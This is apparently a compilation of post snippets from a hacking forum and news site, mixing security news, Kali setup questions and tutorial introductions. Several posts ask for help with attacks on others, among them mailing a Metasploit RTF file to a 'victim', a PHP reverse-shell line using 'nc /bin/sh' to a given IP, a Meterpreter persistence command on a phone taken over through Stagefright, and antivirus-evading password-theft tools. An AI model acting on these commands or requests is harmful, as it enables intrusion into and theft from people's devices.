Hi guys, I don't know if this is the right section to ask this kind of question, if it's not the right one I'm kindly asking the moderators to take it elsewhere.
SSH local forwarding is a must for covering your tracks and getting out there to do your work. Also called SSH tunneling, this process will put one or more steps between your machine and the machine you're working on, for security and other purposes. It can be a bit daunting for newbies to get down, and that's where Punchabunch comes in.
So I'm part of a gaming community called Upper Echelon Gamers which goes so far as to help people who want to stream or make videos by supporting them through it all by promoting them etc, going so far at times to buy hardware for them. That's not why I'm here though, that's just the background.
Hey guys! I'm working on using the instructions in the article "How to Spy on Anyone: Part 1" for a project. However, when I give the "exploit" command in Metasploit, no file is created. It says that the command went through and that the .rtf virus file saved, but the file hasn't saved anywhere on the computer. If it's not supposed to save, how do I email it to my victim? And if it is supposed to save, why won't it? Help greatly appreciated!
With chips in four out every five PCs made since 2010, few companies are as pervasive in modern computing as Intel. That's why an advisory released Monday, May 1, confirming a remotely exploitable vulnerability in all non-server business hardware made in the last seven years has sentshockwavesthroughthetechnologyworld.
Like we all know that remote file inclusion need to be write in php and upload to the webhost, then send to vulnerable page, to open reverse connection, so i wanna ask if this method need port fowarding, because in the php line where we put ("nc /bin/sh 192.168.1.2:8080") so do i need to port foward port 8080? thanks!
Hei I have a question. How can i set up a persistence Backdoor WITHOUT an apk. So I used Stagefright and connected successfullyto the phone. But this command --> run persistence -A -U 30 -p 4444 -r 10.0.0.11 does not work on android. Only on PC. So how can make a persistence connection WITHOUT apk? Or can I install an apk while successfull connected to the phone? Please help me, I am lerning :)
Say Hi to you skilled hacker ! i'm just wanna ask if there any ACTIVE group in facebook for hacking activities, sharing tools and ways, or always update things up. I cannot find that kind of group because all of them are "dead".
For some reason I have been trying several ways to do a kali USB Drive and I have been nothing but unsuccesfull. I have follewed many many direccions from Null Byte and others but I cant seem to get it right or They are just not working for me. Plz some one help!!!!
I am a beginner in hacking . I want some advices to begain correctly .What i have to start first .; network or kali linux ,........?!..Tools i will need .?Materials..?Which programming language i have to learn .?!.What i do to be safe ?...Thank you....
Maybe you thought sitting behind a Mac gives you special protection when it comes to getting hacked. Thanks to a a new report from Check Point, you can kiss that theory goodbye. The cyber security company just uncovered the latest strain of malware — OSX/Dok — infecting all versions of macOS (previously Mac OS X).
Hey i was wondering how to use port forwarding on this wan-attack This video is the attack i am doingMy router has port-forwarding and the model is cisco dpc3827.My computer has kali linux installed on it.I have already succesfully done this attack on someone on my own network and it was succesful.I was also wondering how to possibly inngect this into like a game or other app but i do not know anything about port-forwarding or like the ports to pick or how to set it up.If you need any extra...
I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable:
Dirty, malformed, and outright mischievous text strings have long been the enemy of interactive website developers. Strings contain any combination of letters, numbers, spaces, and punctuation, and are entered into text boxes on websites by users. These strings in particular can do everything from highlighting XSS vulnerabilities to soliciting 404 error pages.
Some video lecture providers have started using this kinda technology where one has to type-in the login details to get inside (An internet connection is necessary).
Hey guys, I have one problem with the social toolkit. I've made a powershell and made .bat file out of it, when I send it to my LAN computers it works perfect, but when I send it to my friends PC to test it out it doesn't connects to my IP address (to my pc), I don't have it in my sessions.
I have installed the newest version of Kali distro on my Raspberry Pi 3. When I try to connect to my wifi I can see some of my neighbours wifis but not mine. Same thing when I try to make a hotspot with my phone. My Wifi just doesn't show up under the available wifis. Same thing with iwconfig.
After I seemingly finish downloading Kali Linux on Virtual Box a terminal pops up, displays a few command lines for a fraction of a second then closes the VM. When I try to boot into it again it restarts the installation process. I was doing a graphical install with an iso I torrented from the official Kali website.
Hi, I was looking for some password retrieval tools for post exploitation that are less well known than things like mimikatz and something that doesn't necessarily flag antivirus straight away, when i came across a tool called laZagne, which comes as a .py file and as a binary if needed. Has anyone got any experience with this tool? If so, please let me know what you think of it and if it is crap or not.
This part will be dedicated to major step in the hacking process : getting access to a shell on the target, which will allow you to execute commands and basically get control of the computer. What we are going to set up can be summed up with this simple drawing :
Hello and welcome to my very first tutorial series ! Its goal is to learn you how to make your own fully functional hacking tool, including shell access to the target, uploading/downloading files, keystrokes record and many other features that will be detailed later in this introduction article.
The Drug Enforcement Agency (DEA) has been purchasing spyware from the Milan-based Hacking Team and its US subsidiary Cicom USA since 2012. Public records reveal invoices between Cicom USA and the DEA that have ranged between $22,000 to $575,000 from 2012 to 2015.
I have looked all around for new windows ten exploits but everything i have found is much outdated and no longer works. I have also found vulnerabilities from different websites but i cannot find the proper exploits in metasploit to exploit them. Does anyone know some recent exploits that have worked for them?
HI everyone I'm new to writing tutorials and this will be my first attempt so if anyone has any advise for me to better myself at this then please leave a comment.
I've been reading articles on this site for quite a while now and the number of great tutorials has always amazed me so I thought I'd try and contribute in some way. One of the recurring comments I see on posts are related to basic networking concept. The question often asked is "How do I perform this hack over the public internet?" and I thought that it might be worthwhile writing a guide to basic networking to help answer that question. This post will aim to provide the basic concepts of...
Hi guys, I'm having a few issues with my port forwarding with kali linux..I've set everything up properly router side but when I use canyouseeme.org I have no connection to the ports ..this brings me to think, is kali linux blocking this? I'm unsure..if anyone has any idea please save a man from going insane and help me lol, thanks.
Pls, I have been trying to do this after I watched a defcon video by Grant Burger but it is so complicated. Will really appreciate it if someone does it step-by-step. Thanks a lot. cc OCCUPYTHEWEB
The Shadow Brokers, a hacker group known for its dump of NSA hacking tools in 2016, has just leaked their remaining set of data which implies that the NSA compromised SWIFT, the global provider of secure financial services, to spy on banks in the Middle East.
ProtonMail has long been the favorite of journalists and security-conscious professionals, with Edward Snowden the most famous example. But these days, everyone cares about anonymity, so it's no surprise that ProtonMail currently has over 2 million users. And now the service is even better.
Sometimes you need a password to gain access to an older running Windows system. Maybe it's a machine in your basement you forgot about or a locked machine that belonged to a disgruntled employee. Maybe you just want to try out your pentesting skills.
It's always nice getting paid to do something you love. That's why Nintendo is offering all Nintendo Switch owners a chance to find vulnerabilities before another hacker beats them to it first. Depending on the vulnerability you find, Nintendo is willing to shell out rewards starting at $100, all the way to $20,000, to the first bug reporter who uncovers it.
Hello, I am my own Administrator and I want to test the strenght of my network. So reinstalled my laptop so there is no password and nothing. So now I am out of my network and I'm playing "hacker". So what should I do? I don't know the password, I don't know the IP of the router I know nothing! How should I start?
For the longest time I didn't care much about anti virus stuff, always had Norton (i know it's shitty) but I was wondering if there was a more respectable AV. I'm downloading Kali Linux on my laptop and a nice AV would probably be a good addition. Thanks in advance
hello recently i started to search a way to write a program that searches a website/forum and saves (downloads) webpages based on a keyword for example i would like to search entire null-byte for posts that have a keyword -for example wifi hacking- and then download any page that has that keyword. From my google search i found out about curl a user said that it can do that but i didnt managed to find a way to do it. could someone point me to the right direction to do that with curl or anyway...
I'm very new to hacking, and im not sure if I would consider myself to be a white hat or black hat, i have no moral standards, but im more curious than malicious. I do want to go into a line of work where pen testing skills will be required, and i'm currently attending college with that intention, however my activities do cross legal lines, however I don't consider that to be anyone's business but mine. My question is, will my questions be answered without criticism of my possible intentions...